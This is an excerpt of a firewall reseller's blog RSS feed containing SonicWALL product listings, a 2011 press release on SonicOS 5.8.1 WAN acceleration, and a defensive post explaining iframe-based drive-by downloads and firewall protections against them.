            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/sonicwall-wxa-5000-with-1-year-of-software-subscription-and-dynamic-support-24x7.html" title="SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/v/i/virtual_appliance_1.jpg" width="135" height="135" alt="SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9819'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/sonicwall-wxa-5000-with-1-year-of-software-subscription-and-dynamic-support-24x7.html" title="SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7">SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7 </a></h2>
					                    <div class="desc std">
                        The WXA 5000 virtual appliance improves application performance through innovative WAN acceleration and optimization technology, while reducing capital costs through virtualization.<br />
» Virtual Appliance<br />
» Up to 120 users<br />
» Reduces capital costs through virtualization                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (1 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10100 (1 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9842'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (1 Year)">Intrusion Prevention and  Anti-Malware for E10100 (1 Year) </a></h2>
					                    <div class="desc std">
                        This is a 1 year subscription of Intrusion Prevention and  Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (2 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10100 (2 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9843'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (2 Year)">Intrusion Prevention and  Anti-Malware for E10100 (2 Year) </a></h2>
					                    <div class="desc std">
                        This is a 2 year subscription of Intrusion Prevention and  Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (3 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10100 (3 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9844'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10100-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10100 (3 Year)">Intrusion Prevention and  Anti-Malware for E10100 (3 Year) </a></h2>
					                    <div class="desc std">
                        This is a 3 year subscription of Intrusion Prevention and  Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (1 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10200 (1 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9845'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (1 Year)">Intrusion Prevention and  Anti-Malware for E10200 (1 Year) </a></h2>
					                    <div class="desc std">
                        This is a 1 year subscription of Intrusion Prevention and  Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (2 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10200 (2 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9846'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (2 Year)">Intrusion Prevention and  Anti-Malware for E10200 (2 Year) </a></h2>
					                    <div class="desc std">
                        This is a 2 year subscription of Intrusion Prevention and  Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (3 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10200 (3 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9847'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10200-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10200 (3 Year)">Intrusion Prevention and  Anti-Malware for E10200 (3 Year) </a></h2>
					                    <div class="desc std">
                        This is a 3 year subscription of Intrusion Prevention and  Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (1 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10400 (1 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9848'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (1 Year)">Intrusion Prevention and  Anti-Malware for E10400 (1 Year) </a></h2>
					                    <div class="desc std">
                        This is a 1 year subscription of Intrusion Prevention and  Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (2 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10400 (2 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9849'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (2 Year)">Intrusion Prevention and  Anti-Malware for E10400 (2 Year) </a></h2>
					                    <div class="desc std">
                        This is a 2 year subscription of Intrusion Prevention and  Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (3 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10400 (3 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9850'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10400-3-year.html" title="Intrusion Prevention and  Anti-Malware for E10400 (3 Year)">Intrusion Prevention and  Anti-Malware for E10400 (3 Year) </a></h2>
					                    <div class="desc std">
                        This is a 3 year subscription of Intrusion Prevention and  Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10800-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10800 (1 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10800 (1 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9851'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10800-1-year.html" title="Intrusion Prevention and  Anti-Malware for E10800 (1 Year)">Intrusion Prevention and  Anti-Malware for E10800 (1 Year) </a></h2>
					                    <div class="desc std">
                        This is a 1 year subscription of Intrusion Prevention and  Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item last">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10800-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10800 (2 Year)" class="product-image">
                		                	<img src="http://static.firewalls.com/media/catalog/product/cache/9/small_image/135x/9df78eab33525d08d6e5fb8d27136e95/i/p/ips_anti_malware_1_1_1_1_1_1_1_1_1_1.gif" width="135" height="135" alt="Intrusion Prevention and  Anti-Malware for E10800 (2 Year)" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9852'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/category-for-cms-pages/wxa/intrusion-prevention-and-anti-malware-for-e10800-2-year.html" title="Intrusion Prevention and  Anti-Malware for E10800 (2 Year)">Intrusion Prevention and  Anti-Malware for E10800 (2 Year) </a></h2>
					                    <div class="desc std">
                        This is a 2 year subscription of Intrusion Prevention and  Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.                    </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
        </ol>
    <script type="text/javascript">decorateList('products-list', 'none-recursive')</script>
			<script language="javascript">
		Event.observe(window, 'load', function() {
			var url = 'http://www.firewalls.com/ajax/index/addtocartbox/';
			var parameters = { productIds: "9598,9812,9813,9814,9815,9816,9817,9818,9819,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852" };
			new Ajax.Request(url, {
				method: 'post',
				parameters: parameters,
				onSuccess: function(transport)  {
					var result = transport.responseText.evalJSON();
					if(result.length>0){
						for(i=0;i<result.length;i++){
							var placeHolder = $('add-to-cart-holder-'+result[i].productId);
							if(placeHolder){
								placeHolder.update(result[i].html);
								fb.activateElements();
							}
						}
					}
				}
			});			
		});	
		</script>
		
    	    <div class="toolbar-bottom">
        <div class="toolbar">
    <div class="pager">
        <p class="amount">
                            Items 1 to 20 of 28 total                    </p>

        <div class="limiter">
            <label>Show</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=10">
                    10                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=20" selected="selected">
                    20                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=50">
                    50                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=75">
                    75                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=100">
                    100                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=200">
                    200                </option>
                        </select> per page        </div>

        
    </div>

        <div class="sorter">
                <p class="view-mode">
                                </p>
            
        <div class="sort-by">
            <label>Sort By</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=position" selected="selected">
                    Position                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=name">
                    Name                </option>
                        </select>
                            <a href="http://www.firewalls.com/blog/rss/index/?dir=desc&amp;order=position" title="Set Descending Direction"><img src="http://static.firewalls.com/skin/frontend/default/default/images/i_asc_arrow.gif" alt="Set Descending Direction" class="v-middle" /></a>
                    </div>
    </div>
    </div>
    </div>
    <div class="clear"></div>
</div>
]]></description>
      <pubDate>Tue, 28 Jun 2011 17:30:40 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Boosts Network Efficiency, Integrates WAN Acceleration with SonicOS 5.8.1]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicos5-8-1/</link>
      <description><![CDATA[<h2>SonicWALL's Combined Firewall and WXA Series Delivers Higher Network Efficiencies</h2><table><tbody><tr></tr><tr><td><img width="200" height="116" src="/media/upload/image/SONICOS_5_8_1.png" alt="WAN Acceleration with SonicOS 5.8.1" /></td><td>SAN JOSE, Calif., June 28, 2011 /PRNewswire/ -- <a target="_blank" href="http://www.firewalls.com/">SonicWALL, Inc</a>., the leading provider of&#160;<a target="_blank" href="http://www.firewalls.com/">intelligent network security</a> and&#160;<a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-cdp-pricing-review">data protection</a> solutions, today announced the availability of <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WAN Acceleration</a> in <a target="_blank" href="http://www.sonicwall.com/us/products/Network_Security_Platform.html?cmp=PR-28062011SonicOS">SonicOS 5.8.1</a>, further enhancing the capabilities of the current <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">SonicWALL Next-Generation Firewall (NGFW) Series</a> and introducing integrated support for the SonicWALL <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WAN Acceleration Appliance (WXA) Series</a>. Today's announcement underscores SonicWALL's commitment to <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">continued investment in its NGFW series</a>  and to providing its customers with a highly secure, accelerated and    optimized network that drives business and employee efficiency.</td></tr></tbody></table><p>The delivery of SonicOS 5.8.1 bolsters <a href="http://www.firewalls.com/sonicwall">SonicWALL</a>'s consolidated security platformand tightly integrates features like application intelligence, control and visualization and deep packet inspection scanning with the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WXA Series to provide WAN optimization and acceleration</a> for the distributed enterprise. The <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WAN acceleration is seamlessly built into</a> the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">existing SonicOS user interface</a>, self-discovers and allows system administrators to easily leverage the new and advanced features.</p>   <p>"A   key requirement for the ongoing success of our business is a secure and   efficient network that we can manage in a smart way," said Michael E.   Crean, president of Solutions Granted. "With the combined <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-sonicos-expanded">power of SonicOS 5.8.1</a> and the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WXA Series</a>, we drive business and employee productivity in two ways. Firstly, we leverage <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">application intelligence and control features to optimize the applications</a> on the network for our business needs. In addition, we can now transmit   business-critical data faster and effectively increase our bandwidth -   this saves us time, money and helps us drive profitability."</p> <p>Additional new features offered by SonicOS 5.8.1 enhance application intelligence and security features in SonicWALL firewalls.&#160;The   new capability to use IP reputation data to block communication with   suspected botnet command and control centers allows administrators to   reduce the risk of having potentially compromised hosts on their network   participate in spam or DDoS attacks. Administrators can further reduce   the risk of data theft or attacks by controlling traffic access by   geography or blocking of traffic from unknown locations.</p> <h3>Key benefits include:</h3> <ul style="margin-left: 20px;">   <li>» Ability   to detect and block communications to botnet command and control   communication centers identified by the SonicWALL GRID network</li>   <li>» Ability   to view and control traffic by geography, thus providing an additional   layer of security by reducing the risk of attacks or data theft</li>   <li>» Ease of Use enhancements for application flow visualization that provide easier methods to quickly create policies based on   real-time application traffic insight to simplify network management</li>   <li>» Increased deployment flexibility with Wire Mode and new opportunities for Deep Packet Inspection that provides greater security and application control</li> </ul> <p>&#160;"As   the data that businesses transmit on their networks grows   exponentially, so does the need to increase the efficiency of firewall   protection. The introduction of SonicOS 5.8.1 further enhances <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">SonicWALL's NGFW</a> offering and improves bandwidth capability, while   protecting against instrusions and malware attacks," said Patrick   Sweeney, vice president product management and corporate marketing at   <a href="http://www.firewalls.com/sonicwall">SonicWALL</a>.</p>  <p>The <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">SonicWALL Network Efficiencies</a> Solution is a tightly <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">integrated security and WAN Acceleration solution</a>. It integrates <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">SonicWALL Application Intelligence </a>and Control and <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">SonicWALL Deep Packet Inspection</a> with the <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">WXA Series</a> and enables businesses to better manage their bandwidth to accelerate   business critical applications. Corporations can consolidate features   for <a target="_blank" href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator">application intelligence and control, DPI scanning, WAN Acceleration and VPN into a single interface</a>.   This can help companies save on IT management costs, reduce the amount   of data being sent between corporate and remote offices and drive   profitability.</p> <p>For more news on Dynamic Security and <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">Next-Generation Networks</a>, follow SonicWALL on <a target="_blank" href="http://www.facebook.com/pages/Firewallscom/99329721611">Facebook</a> and <a target="_blank" href="http://twitter.com/#!/firewallscom">Twitter</a>.</p>]]></description>
      <pubDate>Tue, 28 Jun 2011 13:52:59 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Drive-by-Downloads and iframes]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/malware_drive_by_download_iframe/</link>
      <description><![CDATA[<table>   <tbody><tr>     <td><img height="67" width="123" alt="Stay Secure with on-going support" src="http://www.firewalls.com/images/stay-secure-doc.png" /></td>     <td><p>There  is no secret that malware is a big threat to organizations of all sizes.<br />     There are many places for malware to infiltrate into an organization. One such  way would be through web surfing. In this blog entry we will focus on drive-by-downloads through  iframes.</p></td>   </tr> </tbody></table> <h2>How it works?</h2> <p>Attackers typically compromise popular web sites and insert a malicious hidden  iframe into a page hosted on the compromised site; the iframe redirects to  another page on a server controlled by attackers; on this page usually heavily  obfuscated code(like JavaScript) is used to serve malware. Users aren't aware  they load content from another site when they view the compromised web page.</p><p align="center"><img height="233" width="357" alt="Drive-by-download " src="/media/upload/image/iframe_how.png" /></p><p>&#160;</p> <h2>Popular web sites serving  malware through iframes?</h2> <p>To name a few recent ones: Geek.com or Lenovo India Warranty.</p> <h2>How  the malicious iframe looks like?</h2> <p>It can look in a couple of ways like shown below.</p><p align="center"><img src="/media/upload/image/iframe_type.png" alt="How the malicious iframe looks like" /></p><p>&#160;</p> <p>As  we can spot from above, the Geek.com and Lenovo India iframes are different. A  generic IPS signature looking for an iframe with a size of zero would have not  caught the Geek.com malicious iframe.</p> <p>Furthermore,  there are additional ways of having non-visible iframes, through some div tags or  scripts(the last two examples).</p> <h2>Malware types served</h2> <ul style="margin-left:20px">   <li>» That automatically download and install malware;  using exploits against vulnerabilities of browsers, etc., unpatched or 0-days  ones. Hackers, based on the browser's user-agent, can attempt to serve multiple  exploits against various vulnerabilities to obtain remote code execution.</li>    <li>» That prompt the user to take some "suggesting" actions;  without exploits like above, for example prompt the users to download and  install malicious signed Java applets or show pop-up windows with a "click to  do something" button.</li> </ul> <h2>Protections?</h2>  <p>No bullet proof methods.<br />   Use a <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">Next Generation Firewall</a> to mitigate on multiple fronts with a single  edge device.</p>      <ul style="margin-left:20px">   <li>» Use the <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">NGFW's</a> integrated IPS or <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">Gateway  antivirus</a> to detect malicious iframes; SonicWall's integrated <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-client-anti-virus">antivirus</a> facility contains several signatures for detecting malicious iframes.
<p align="center"><img alt="SonicWall's integrated antivirus facility" src="/media/upload/image/iframe_sonicwal_sigs.png" /></p></li>   <li>» With  this type of attacks, usually the malware is served from obscure sites; use the  <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series">NGFW's</a> integrated URL Filtering service and at a minimum block dangerous  destinations if you do not use whitelist categories.
